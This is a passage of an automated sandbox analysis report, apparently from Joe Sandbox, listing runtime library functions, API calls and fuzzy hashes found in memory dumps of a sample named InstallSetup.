                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
                                                                                                • __alloca_probe_16.LIBCMT ref: 004321C6
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
                                                                                                • __alloca_probe_16.LIBCMT ref: 004322AB
                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
                                                                                                • __freea.LIBCMT ref: 0043231B
                                                                                                  • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                • __freea.LIBCMT ref: 00432324
                                                                                                • __freea.LIBCMT ref: 00432349
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3864826663-0
                                                                                                • Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                                                                • Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
                                                                                                • Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                                                                • Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698
                                                                                                APIs
                                                                                                  • Part of subcall function 00972141: GetLastError.KERNEL32(?,?,0096A9EC,?,00000000,?,0096CDE6,0094247E,00000000,?,00451F20), ref: 00972145
                                                                                                  • Part of subcall function 00972141: _free.LIBCMT ref: 00972178
                                                                                                  • Part of subcall function 00972141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721B9
                                                                                                • _free.LIBCMT ref: 00971444
                                                                                                • _free.LIBCMT ref: 0097145D
                                                                                                • _free.LIBCMT ref: 0097148F
                                                                                                • _free.LIBCMT ref: 00971498
                                                                                                • _free.LIBCMT ref: 009714A4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorLast
                                                                                                • String ID: C
                                                                                                • API String ID: 3291180501-1037565863
                                                                                                • Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                • Instruction ID: d99ad775ea94633275325f35adfed0dfdc89a93246f2e90294f1068cb2c18e50
                                                                                                • Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                • Instruction Fuzzy Hash: 28B13976A01219DFDB24DF18C885BADB7B4FB48704F5085AAE94DA7361E730AE90CF40
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                • Instruction ID: fd84ffea0ae3700d1048a83f8f2703d942af9cd116486953538e014749980fa0
                                                                                                • Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                • Instruction Fuzzy Hash: 3361E172904205AFDB20CF68C842B9EBBF8FF85710F1481AAE958EB282D7719D419B55
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                • Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
                                                                                                • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                • Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59
                                                                                                APIs
                                                                                                • GetConsoleCP.KERNEL32(?,0096C4A4,E0830C40,?,?,?,?,?,?,0097425F,0094E03C,0096C4A4,?,0096C4A4,0096C4A4,0094E03C), ref: 00973B2C
                                                                                                • __fassign.LIBCMT ref: 00973BA7
                                                                                                • __fassign.LIBCMT ref: 00973BC2
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,0096C4A4,00000001,?,00000005,00000000,00000000), ref: 00973BE8
                                                                                                • WriteFile.KERNEL32(?,?,00000000,0097425F,00000000,?,?,?,?,?,?,?,?,?,0097425F,0094E03C), ref: 00973C07
                                                                                                • WriteFile.KERNEL32(?,0094E03C,00000001,0097425F,00000000,?,?,?,?,?,?,?,?,?,0097425F,0094E03C), ref: 00973C40
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 1324828854-0
                                                                                                • Opcode ID: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
                                                                                                • Instruction ID: 07e137e2fbff54249c56ddcb49127386f47ec91bfc7755057f64f064c7b92a0f
                                                                                                • Opcode Fuzzy Hash: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
                                                                                                • Instruction Fuzzy Hash: 6D51A8759002099FDB11CFA4D845AEEBBF8EF09701F18826AE959F7251D7309A41CF64
                                                                                                APIs
                                                                                                • GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
                                                                                                • __fassign.LIBCMT ref: 00433940
                                                                                                • __fassign.LIBCMT ref: 0043395B
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
                                                                                                • WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
                                                                                                • WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 1324828854-0
                                                                                                • Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                                                                • Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
                                                                                                • Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                                                                • Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69
                                                                                                APIs
                                                                                                • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00964ACD
                                                                                                  • Part of subcall function 00964D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00964800), ref: 00964DAC
                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00964AE2
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00964AF1
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00964AFF
                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 00964B75
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00964BB5
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00964BC3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                • String ID:
                                                                                                • API String ID: 3151764488-0
                                                                                                • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                • Instruction ID: c2da296729d0afdfb2c81286840c769e5eb876d2595dc93a1d83f5f7b79eb2cd
                                                                                                • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                • Instruction Fuzzy Hash: 0131B435A00214ABCF04EFE8C981B6E73B9FF85310F204569E9159B382DB70EE05C794
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                                • Instruction ID: 0596ef30837e20da46eca133a39211d8496637e9670089f0862d81a9507a7c8b
                                                                                                • Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                                • Instruction Fuzzy Hash: 52112937504119BFDB212F768C19A6B7B5CEFC2B60B248A35FC5DE7140DA348900D6B0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                • Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
                                                                                                • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                • Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669
                                                                                                APIs
                                                                                                  • Part of subcall function 0097A331: _free.LIBCMT ref: 0097A35A
                                                                                                • _free.LIBCMT ref: 0097A638
                                                                                                  • Part of subcall function 009736D1: HeapFree.KERNEL32(00000000,00000000,?,0097A35F,?,00000000,?,00000000,?,0097A603,?,00000007,?,?,0097A9F7,?), ref: 009736E7
                                                                                                  • Part of subcall function 009736D1: GetLastError.KERNEL32(?,?,0097A35F,?,00000000,?,00000000,?,0097A603,?,00000007,?,?,0097A9F7,?,?), ref: 009736F9
                                                                                                • _free.LIBCMT ref: 0097A643
                                                                                                • _free.LIBCMT ref: 0097A64E
                                                                                                • _free.LIBCMT ref: 0097A6A2
                                                                                                • _free.LIBCMT ref: 0097A6AD
                                                                                                • _free.LIBCMT ref: 0097A6B8
                                                                                                • _free.LIBCMT ref: 0097A6C3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                • Instruction ID: 6a527000f13114c886a0b141a80d28703e61384099789f4e2a45cb93c3290887
                                                                                                • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                • Instruction Fuzzy Hash: F0113A72644B04BADE20BBB1CC47FCF779CFFC0700F40C825B29DAA152DA65B6149651
                                                                                                APIs
                                                                                                  • Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3
                                                                                                • _free.LIBCMT ref: 0043A3D1
                                                                                                  • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                  • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                • _free.LIBCMT ref: 0043A3DC
                                                                                                • _free.LIBCMT ref: 0043A3E7
                                                                                                • _free.LIBCMT ref: 0043A43B
                                                                                                • _free.LIBCMT ref: 0043A446
                                                                                                • _free.LIBCMT ref: 0043A451
                                                                                                • _free.LIBCMT ref: 0043A45C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                • Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
                                                                                                • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                • Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46
                                                                                                APIs
                                                                                                • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00950DA0,?,?,?,00000000), ref: 00952667
                                                                                                • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00950DA0,?,?,?,00000000), ref: 0095266D
                                                                                                • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00950DA0,?,?,?,00000000), ref: 0095269A
                                                                                                • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00950DA0,?,?,?,00000000), ref: 009526A4
                                                                                                • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00950DA0,?,?,?,00000000), ref: 009526B6
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009526CC
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 009526DA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                • String ID:
                                                                                                • API String ID: 4227777306-0
                                                                                                • Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                                                                • Instruction ID: 9d98fbfd19d62470e8764d6c50a548e5cc4cb3bf23089f70b90fc6ed10e83acd
                                                                                                • Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                                                                • Instruction Fuzzy Hash: E101A735502115A7D720FF66EC49FAF376CAF83B53B500926F805E2061DB25D90887A9
                                                                                                APIs
                                                                                                • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412400
                                                                                                • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412406
                                                                                                • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412433
                                                                                                • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041243D
                                                                                                • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041244F
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00412473
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                • String ID:
                                                                                                • API String ID: 4227777306-0
                                                                                                • Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                                                                • Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
                                                                                                • Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                                                                • Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0095670B), ref: 009524B6
                                                                                                • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 009524C4
                                                                                                • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 009524D2
                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0095670B), ref: 00952500
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00952507
                                                                                                • GetLastError.KERNEL32(?,?,?,0095670B), ref: 00952522
                                                                                                • GetLastError.KERNEL32(?,?,?,0095670B), ref: 0095252E
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00952544
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00952552
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                • String ID: kernel32.dll
                                                                                                • API String ID: 4179531150-1793498882
                                                                                                • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                • Instruction ID: 09e05cbbfde34b834e0f7fbf727c97cdb790429c3dcb5434e76ac830b5134407
                                                                                                • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                • Instruction Fuzzy Hash: 86F086759003103FAB117B766C8991B3FACDE47B233100636F811E21D2EA7589018658
                                                                                                APIs
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C677
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw
                                                                                                • String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 2005118841-3619870194
                                                                                                • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                • Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
                                                                                                • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                • Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C
                                                                                                APIs
                                                                                                  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                • _memcmp.LIBVCRUNTIME ref: 0043116C
                                                                                                • _free.LIBCMT ref: 004311DD
                                                                                                • _free.LIBCMT ref: 004311F6
                                                                                                • _free.LIBCMT ref: 00431228
                                                                                                • _free.LIBCMT ref: 00431231
                                                                                                • _free.LIBCMT ref: 0043123D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorLast$_memcmp
                                                                                                • String ID:
                                                                                                • API String ID: 4275183328-0
                                                                                                • Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                                                                • Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
                                                                                                • Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                                                                • Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,009725EC,00000001,00000001,?), ref: 009723F5
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,009725EC,00000001,00000001,?,?,?,?), ref: 0097247B
                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00972575
                                                                                                • __freea.LIBCMT ref: 00972582
                                                                                                  • Part of subcall function 0097390E: RtlAllocateHeap.NTDLL(00000000,0094DAD7,00000000), ref: 00973940
                                                                                                • __freea.LIBCMT ref: 0097258B
                                                                                                • __freea.LIBCMT ref: 009725B0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1414292761-0
                                                                                                • Opcode ID: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
                                                                                                • Instruction ID: f61864667b6f6cfa0451b2ea1e559967b0a3d998706db3114ba0b34a93185cda
                                                                                                • Opcode Fuzzy Hash: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
                                                                                                • Instruction Fuzzy Hash: 3A51EF73A2021BABEB258F64CC55FBF77A9EB84750F258628FC08D6150EB74DD40C664
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __cftoe
                                                                                                • String ID:
                                                                                                • API String ID: 4189289331-0
                                                                                                • Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                                • Instruction ID: a84c9fc10c12703227fa7b6678a6278c1f9334b66decf24dfdc7ea776ca99671
                                                                                                • Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                                • Instruction Fuzzy Hash: 34511D7A900205ABDF209B78CC45FAE77ACFF88374F54821AF819D6192EF35DD009664
                                                                                                APIs
                                                                                                • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 00963051
                                                                                                  • Part of subcall function 00958AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 00958ABD
                                                                                                • SafeSQueue.LIBCONCRT ref: 0096306A
                                                                                                • Concurrency::location::_Assign.LIBCMT ref: 0096312A
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0096314B
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00963159
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                                                                • String ID:
                                                                                                • API String ID: 3496964030-0
                                                                                                • Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                                                                • Instruction ID: 7dc6b7e851646dfcd9683a5f752ac3b6f1a11fbff2bf20359fc4306284ea7056
                                                                                                • Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                                                                • Instruction Fuzzy Hash: 1731F231A04A119FCB25EF65C841B6AB7B4FF84711F108569EC069B292DB30EE49CBC0
                                                                                                APIs
                                                                                                • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00968F77
                                                                                                • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00968F90
                                                                                                • FindVITargetTypeInstance.LIBVCRUNTIME ref: 00968F97
                                                                                                • PMDtoOffset.LIBCMT ref: 00968FB6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FindInstanceTargetType$Offset
                                                                                                • String ID:
                                                                                                • API String ID: 1467055271-0
                                                                                                • Opcode ID: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
                                                                                                • Instruction ID: 59b9dce2a644a2f1189c35bc4a8f6d0ff8c18935d10de507487479a1a9d67210
                                                                                                • Opcode Fuzzy Hash: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
